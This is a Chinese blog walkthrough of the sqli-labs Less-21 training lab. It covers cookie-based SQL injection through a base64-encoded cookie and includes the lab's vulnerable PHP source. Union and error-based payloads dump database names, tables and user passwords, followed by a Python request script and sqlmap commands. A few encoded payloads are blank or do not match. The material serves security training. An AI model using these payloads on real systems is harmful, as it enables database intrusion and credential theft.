sqli-lab-less21

最新推荐文章于 2024-05-16 15:37:55 发布
最新推荐文章于 2024-05-16 15:37:55 发布
阅读量59 收藏
点赞数
分类专栏: sql注入 文章标签: 网络安全 数据库 mysql sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Sa1nZen/article/details/132120562
版权
sqli-lab-less21

一、靶标地址

Less-21 POST-Dump into outfile -String
#输出文件
http://127.0.0.1/sqli/less-21/

二、漏洞探测

输入admin admin
得到post数据包
uname=admin&passwd=admin&submit=Submit
#发现回显
#YOUR USER AGENT IS : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
#YOUR IP ADDRESS IS : 127.0.0.1
#DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE
#YOUR COOKIE : uname = YWRtaW4= and expires: Sat 05 Aug 2023 - 06:05:35
#Your Login name:admin
#Your Password:admin
#Your ID:8

#可以发现uname这里疑似base64加密

#使用cyberchef进行base64解密 解密为admin


#抓包结果
#第一个包
POST /sqli/less-21/index.php HTTP/1.1
Host: 192.168.128.159
Content-Length: 38
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.128.159
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.128.159/sqli/less-21/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

uname=admin&passwd=admin&submit=Submit

#第二个包
GET /sqli/less-21/index.php HTTP/1.1
Host: 192.168.128.159
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.128.159/sqli/less-21/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: uname=YWRtaW4%3D
Connection: close

三、源码分析

<?php
//including the Mysql connect parameters.
	include("../sql-connections/sql-connect.php");
if(!isset($_COOKIE['uname']))
	{
	//including the Mysql connect parameters.
	include("../sql-connections/sql-connect.php");

	echo "<div style=' margin-top:20px;color:#FFF; font-size:24px; text-align:center'> Welcome&nbsp;&nbsp;&nbsp;<font color='#FF0000'> Dhakkan </font><br></div>";
	echo "<div  align='center' style='margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;'>";
	echo "<div style='padding-top:10px; font-size:15px;'>";
 

	echo "<!--Form to post the contents -->";
	echo '<form action=" " name="form1" method="post">';

	echo ' <div style="margin-top:15px; height:30px;">Username : &nbsp;&nbsp;&nbsp;';
	echo '   <input type="text"  name="uname" value=""/>  </div>';
  
	echo ' <div> Password : &nbsp; &nbsp; &nbsp;';
	echo '   <input type="text" name="passwd" value=""/></div></br>';	
	echo '   <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>';

	echo '</form>';
	echo '</div>';
	echo '</div>';
	echo '<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">';
	echo '<font size="3" color="#FFFF00">';
	echo '<center><br><br><br>';
	echo '<img src="../images/Less-21.jpg" />';
	echo '</center>';





	
function check_input($value)
	{
	if(!empty($value))
		{
		$value = substr($value,0,20); // truncation (see comments)
		}
		if (get_magic_quotes_gpc())  // Stripslashes if magic quotes enabled
			{
			$value = stripslashes($value);
			}
		if (!ctype_digit($value))   	// Quote if not a number
			{
			$value = "'" . mysql_real_escape_string($value) . "'";
			}
	else
		{
		$value = intval($value);
		}
	return $value;
	}


	
	echo "<br>";
	echo "<br>";
	
	if(isset($_POST['uname']) && isset($_POST['passwd']))
		{
	
		$uname = check_input($_POST['uname']);
		$passwd = check_input($_POST['passwd']);
		
	

		
		$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
		$result1 = mysql_query($sql);
		$row1 = mysql_fetch_array($result1);
			if($row1)
				{
				echo '<font color= "#FFFF00" font size = 3 >';
				setcookie('uname', base64_encode($row1['username']), time()+3600);	
				//base64加密
				echo "I LOVE YOU COOKIES";
				echo "</font>";
				echo '<font color= "#0000ff" font size = 3 >';			
				//echo 'Your Cookie is: ' .$cookee;
				echo "</font>";
				echo "<br>";
				print_r(mysql_error());			
				echo "<br><br>";
				echo '<img src="../images/flag.jpg" />';
				echo "<br>";
				header ('Location: index.php');
				}
			else
				{
				echo '<font color= "#0000ff" font size="3">';
				//echo "Try again looser";
				print_r(mysql_error());
				echo "</br>";			
				echo "</br>";
				echo '<img src="../images/slap.jpg" />';	
				echo "</font>";  
				}
			}
		
			echo "</font>";  
	echo '</font>';
	echo '</div>';

}
else
{



	if(!isset($_POST['submit']))
		{
			$cookee = $_COOKIE['uname'];
			$format = 'D d M Y - H:i:s';
			$timestamp = time() + 3600;
			echo "<center>";
			echo "<br><br><br><b>";
			echo '<img src="../images/Less-21.jpg" />';
			echo "<br><br><b>";
			echo '<br><font color= "red" font size="4">';	
			echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
			echo "</font><br>";	
			echo '<font color= "cyan" font size="4">';	
			echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];			
			echo "</font><br>";			
			echo '<font color= "#FFFF00" font size = 4 >';
			echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";
			echo '<font color= "orange" font size = 5 >';			
			echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
			
			$cookee = base64_decode($cookee);#base64解密
			echo "<br></font>";
			$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
			$result=mysql_query($sql);
			if (!$result)
  				{
  				die('Issue with your mysql: ' . mysql_error());
  				}
			$row = mysql_fetch_array($result);
			if($row)
				{
			  	echo '<font color= "pink" font size="5">';	
			  	echo 'Your Login name:'. $row['username'];#打印username
			  	echo "<br>";
				echo '<font color= "grey" font size="5">';  	
				echo 'Your Password:' .$row['password'];#打印password
			  	echo "</font></b>";
				echo "<br>";
				echo 'Your ID:' .$row['id'];
			  	}
			else	
				{
				echo "<center>";
				echo '<br><br><br>';
				echo '<img src="../images/slap1.jpg" />';
				echo "<br><br><b>";
				//echo '<img src="../images/Less-20.jpg" />';
				}
			echo '<center>';
			echo '<form action="" method="post">';
			echo '<input  type="submit" name="submit" value="Delete Your Cookie!" />';
			echo '</form>';
			echo '</center>';
		}	
	else
		{
		echo '<center>';
		echo "<br>";
		echo "<br>";
		echo "<br>";
		echo "<br>";
		echo "<br>";
		echo "<br>";
		echo '<font color= "#FFFF00" font size = 6 >';
		echo " Your Cookie is deleted";
				setcookie('uname', base64_encode($row1['username']), time()-3600);//base64加密
				header ('Location: index.php');
		echo '</font></center></br>';
		
		}		


			echo "<br>";
			echo "<br>";
			//header ('Location: main.php');
			echo "<br>";
			echo "<br>";
			
			//echo '<img src="../images/slap.jpg" /></center>';
			//logging the connection parameters to a file for analysis.	
		$fp=fopen('result.txt','a');
		fwrite($fp,'Cookie:'.$cookee."\n");
	
		fclose($fp);
	
}
?>

业务流程同less-20,只不过加入base64加密和解密,在需要查询的时候解密,在要设置的解密
提交coookie的时候是加密的

四、黑盒与白盒测试

$cookee = base64_decode($cookee);#base64解密
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
$result=mysql_query($sql);
if (!$result)
    {
    die('Issue with your mysql: ' . mysql_error());
    }
第一个是让语法报错,函数报错回显
echo 'Your Password:' .$row['password'];#打印password
第二个是password回显

#首先进行探测语句
uname=1'
uname=MSc=
#Issue with your mysql: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1

猜测语句'1'') LIMIT 0,1
推断语句为select * from xxx where username=('$username') limit 0,1;

联合查询
#获取数据库 用户版本号
uname=1') union select database(),user(),version() #
uname=MScpIHVuaW9uIHNlbGVjdCBkYXRhYmFzZSgpLHVzZXIoKSx2ZXJzaW9uKCkgIw==

#获取表名
uname=1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' #
uname=MScpIHVuaW9uIHNlbGVjdCAxLDIsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9J3NlY3VyaXR5JyAj

#获取字段名
uname=1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' #
uname=MScpIHVuaW9uIHNlbGVjdCAxLDIsZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX25hbWU9J3VzZXJzJyAj

#获取字段值
uname=1') union select (select group_concat(username) from users),(select group_concat(password) from users),3 #
uname=MScpIHVuaW9uIHNlbGVjdCAoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSkgZnJvbSB1c2VycyksKHNlbGVjdCBncm91cF9jb25jYXQocGFzc3dvcmQpIGZyb20gdXNlcnMpLDMgIw==

1、floor()函数报错
#获取数据库 用户 版本号
Cookie:
uname=1') and (select 1 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a)limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) #
uname=MScpIGFuZCAoc2VsZWN0IDEgZnJvbSAoc2VsZWN0IGNvdW50KCopLGNvbmNhdCgoc2VsZWN0IGNvbmNhdCh2ZXJzaW9uKCksMHgzYSwweDNhLGRhdGFiYXNlKCksMHgzYSwweDNhLHVzZXIoKSwweDNhKWxpbWl0IDAsMSksZmxvb3IocmFuZCgwKSoyKSl4IGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyBncm91cCBieSB4KWEpICM=
#因为update语句无法使用union select,所以用and并将后面()

#获取表名
Cookie:
uname=1') and (select 1,2,3 from (select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) #
uname=MScpIGFuZCAoc2VsZWN0IDEsMiwzIGZyb20gKHNlbGVjdCBjb3VudCgqKSxjb25jYXQoKHNlbGVjdCBjb25jYXQodGFibGVfbmFtZSwweDNhLDB4M2EpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSBsaW1pdCAwLDEpLGZsb29yKHJhbmQoMCkqMikpeCBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgZ3JvdXAgYnkgeClhKSAj

#获取列名
Cookie:
uname=1') and (select 1,2,3 from (select count(*),concat((select concat(column_name,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) #
uname=MScpIGFuZCAoc2VsZWN0IDEsMiwzIGZyb20gKHNlbGVjdCBjb3VudCgqKSxjb25jYXQoKHNlbGVjdCBjb25jYXQoY29sdW1uX25hbWUsMHgzYSwweDNhKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpIGFuZCB0YWJsZV9uYW1lPSd1c2VycycgbGltaXQgMSwxKSxmbG9vcihyYW5kKDApKjIpKXggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkgIw==

#获取用户名
Cookie:
uname=1') and (select 1,2,3 from (select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) #
uname=MScpIGFuZCAoc2VsZWN0IDEsMiwzIGZyb20gKHNlbGVjdCBjb3VudCgqKSxjb25jYXQoKHNlbGVjdCBjb25jYXQodXNlcm5hbWUsMHgzYSwweDNhLHBhc3N3b3JkLDB4M2EsMHgzYSkgZnJvbSBzZWN1cml0eS51c2VycyBsaW1pdCAxLDEpLGZsb29yKHJhbmQoMCkqMikpeCBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgZ3JvdXAgYnkgeClhKSAj

2、updatexml()函数报错
#获取数据库名
Cookie:
uname=1') and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) #
uname=MScpIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoJ34nLGRhdGFiYXNlKCksJ34nLHVzZXIoKSwnficsdmVyc2lvbigpKSwxKSAj

#获取表名
Cookie:
uname=1') and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),0) #
uname=MScpIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHRhYmxlX25hbWUgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknIGxpbWl0IDAsMSkpLDApICM=

#获取列名
Cookie:
uname=1') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')),0) #
uname=MScpIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSBhbmQgdGFibGVfbmFtZT0ndXNlcnMnKSksMCkgIw==

#获取列字段
Cookie:
uname=1') and updatexml(1,concat(0x7e,(select password from security.users limit 0,1),0x7e),0) #
uname=MScpIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHBhc3N3b3JkIGZyb20gc2VjdXJpdHkudXNlcnMgbGltaXQgMCwxKSwweDdlKSwwKSAj

3、extractvalue()函数报错

#获取当期数据库名
Cookie:
uname=1') and extractvalue(1,concat(0x7e,(select database()))) #
uname=

#获取表名
Cookie:
uname=1') and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) #
uname=MScpIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpKSkgIw==

#获取列名
Cookie:
uname=1') and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))) #
uname=MScpIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9zY2hlbWE9ZGF0YWJhc2UoKSBhbmQgdGFibGVfbmFtZT0ndXNlcnMnKSkpICM=

#获取列字段
Cookie:
uname=1') and extractvalue(1,concat(0x7e,(select username from security.users limit 0,1),0x7e)) #
uname=MScpIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHVzZXJuYW1lIGZyb20gc2VjdXJpdHkudXNlcnMgbGltaXQgMCwxKSwweDdlKSkgIw==

Cookie:
uname=1') and extractvalue(1,concat(0x7e,(select password from security.users limit 0,1),0x7e)) #
uname=MScpIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHBhc3N3b3JkIGZyb20gc2VjdXJpdHkudXNlcnMgbGltaXQgMCwxKSwweDdlKSkgIw==

五、脚本撰写

import requests
import base64

url="http://192.168.128.159/sqli/less-21/index.php"

payload = "1') and (select 1 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a)limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) #"
payload_encode = "uname=" + str(base64.b64encode(payload.encode('utf-8')),encoding="utf-8")
#这里需要直接使用str会转换成b'hello',只有变成str(a,encoding="utf-8")时才会变成hello
header={
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36',
        'Accept-Language': 'en-US,en;q=0.9',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
        'Cookie': payload_encode
}
postdata = {
        "uname" : "admin",
        "passwd" : "admin"
}
response=requests.post(url,headers=header,data=postdata)
print(response.text)

六、sqlmap

sqlmap -u "http://192.168.128.159/sqli/less-21/index.php" --cookie --level 3 --batch
#未探测出

sqlmap -r target.txt --batch
#未探测出

GET /sqli/less-21/index.php HTTP/1.1
Host: 192.168.128.159
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.128.159/sqli/less-21/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: *
Connection: close

七、总结

1、base64加解密的脚本撰写
Sa1nZen
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-lab通关txt
07-22
sqli-lab1~10的通关txt,其中包含了注入代码以及相关注解 代码由于存储在txt中,无法直接复制使用,请手打。 (可能是由于编码问题)
WEB漏洞-SQL注入之二次加解密,DNS等注入(学习笔记)
qq_19375535的博客
07-02 469
sql注入学习笔记
sqli-labs-master通关之LESS20-LESS25
weixin_43726831的博客
10-09 816
SQL注入之sqli-labs-master LESS-20 第20关 POST交互方式下的cookie字段注入 第20关正确的回显页面如下图所示 从图中可以看出这一关是与cookie有关,正确的页面进入后,只有一个按钮Delete your cookie! cookie是客户端记录的会话信息,session记录服务器端的会话信息,此时客户端已经记录了与服务器端交互的会话内容,由此可推断出,注入...
密码重置
weixin_30674525的博客
05-29 348
http://nctf.nuptzj.cn/web13/index.php?user1=Y3RmdXNlcg== Y3RmdXNlcg==一看就是base64 解密ctfuser== 然后查看元代码 vcode user newpass 我的账号应该是管理员账号admin 编码YWRtaW4=%3d%3d 然后注入 flag is:nctf{reset_...
风云杯大学生信安大赛(Web部分题解)
saltor
05-15 1万+
PS:菜鸟一枚,只做出了7题,第8,9题见过类似的但还是不会。。。还是坐等大神们的wp吧。WEB01http://139.129.166.67/4t56ysgh6h7u/ 答案格式:仅输入{ }花括号中的内容 分值 50 本题考查的是正则表达式页面源码:<?php highlight_file('2.php'); $key='KEY{*****************************
(17)网络安全:cookie注入、二次注入、DNSlog注入、中转注入、堆叠注入的原理及注入过程
02-26 3331
原理、靶场、步骤、注入
第三节 Sqli-lab环境搭建-01
09-15
第三节 Sqli-lab环境搭建-01
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
sqli-lab注入练习源码
06-25
本套源码是sqli-lab,练习sql再好不过,将源码用phpstudy搭建即可开始练习
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
网络安全进阶篇(十一章-5)APP渗透测试篇(上)
热门推荐
划水的小白白
08-02 1万+
每日一句: 渗透测试,一定要有耐心,所有的功能点都要测试。 很多地方不亲身经历是没有太多的感受的。 一、App渗透测试原理 1.简介 App渗透测试与Web渗透测试从某种角度说基本没有区别 App其实就是手机软件,咱们不需要害怕他。 说一个简单的道理,一个网站存在sql注入,用电脑访问存在,用咱们的手机去访问一样存在注入。 大部分漏洞的存在并不是在客户端而是在服务端 例如: SQL注入、验证码绕过、越
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8227
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
为什么Redis6.0引入了多线程
IT深耕十余载,大道之简
05-11 531
总的来说,Redis 6.0引入多线程是为了提高性能、降低延迟、更好地利用CPU资源,并保持Redis的简单性和高性能特点。这些改进有助于Redis更好地应对不断增长的数据量和并发量需求,同时保持其稳定性和可靠性。Redis 6.0引入多线程的决策是基于其性能优化和适应现代硬件架构的考虑。
实战项目技术点(1)
qq_60396437的博客
05-15 1084
分页插件PageHelper 是 Mybatis 的一款功能强大、方便易用的分页插件,支持任何形式的单标、多表的分页查询。官网:https://pagehelper.github.io/。文件上传,是指将本地图片、视频、音频等文件上传到服务器,供其他用户浏览或下载的过程。
简述redis数据类型及应用场景
qq_45927587的博客
05-10 358
每种数据类型的选择应当基于具体的应用需求,比如是否需要排序、是否允许重复元素、是否需要执行集合运算等。Redis作为一种高性能的内存数据存储系统,提供了多种数据结构来满足不同场景下的需求。: 双向链表,可以做栈(LPOP/RPOP)、队列(LPUSH/RPOP)或实现发布/订阅模式。: 最基本的数据类型,可以存储字符串、整数或者浮点数等数据。支持原子性操作,如增、删、改、查。: 无序且不重复的字符串集合,支持集合运算如并集、交集、差集。: 用于存储键值对的集合,每个哈希可以存储多个字段-值对。
mybatis 跨库查询 mysql
zzhongcy的专栏
05-11 424
跨库,表关联的查询,实现起来很简单:selecta.uidfrom只要在表的前边加上库名即可。
MySql软件安装
m0_62731842的博客
05-12 424
1.打开mysql官网网址 MySQL :: Download MySQL Community Server 2.本次针对版本8的图形化界面安装,下载成功后接下来对MySQL进行安装 3.图形化下载后有一个MSI文件 4.我们安装典型即可,选择第一个 5.选择数据库信息存放的路径,我默认放在C盘不做改变 6.MySQL平时作为一些应用的数据提供者,选择服务类型即可 7.端口号(暴露的端口号便于我们连接数据库,进行相关数据操作)可以修改,但我们平常使用的端口号是33
java中实现缓存的几种方式
最新发布
shenxiaomo1688的博客
05-16 682
Redis 是C语言开发的一个开源高性能键值对的内存数据库,可以用来做数据库、缓存、消息中间件等场景,是一种NoSQL(not-only sql,非关系型数据库)的数据库。下面我们介绍在springboot项目中的使用springboot中有redis的starter我们直接引用即可然后在spring配置文件中加入如下设置,这里用的是properties形式的文件,host是部署redis的服务器ip,port是端口号,password是密码,如果没有设置密码不填即可同样我们编写接口测试。
面试题-实例
qq_69325307的博客
05-12 467
ComponentScan注解就是包扫描,不重写的话,默认就是当前类下及其子包下都会扫描到,扫描哪些@Component注解的类,交给容器来管理。接着走A的逻辑,因为B已经初始化完成,所以A就可以直接引用B,来完成初始化,接着把A放入一级缓存中。,B又需要依赖A,这时候就会到三级缓存中,由beanFactory生产A对象,此时可以是代理对象,接着把A放入二级缓存中。线程池就是事先将创建好的线程进行整合,当需要使用的时候,直接拿出来进行使用,不用现去创建,可以节约开辟的时间,提高效率。
sqli-lab安装
09-05
要安装sqli-lab,您需要按照以下步骤进行操作: 1. 首先,确保您具有Web服务器环境。您可以使用Apache、Nginx或其他适合您的环境的Web服务器。 2. 下载sqli-lab的代码。您可以从GitHub存储库中获取它,链接:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值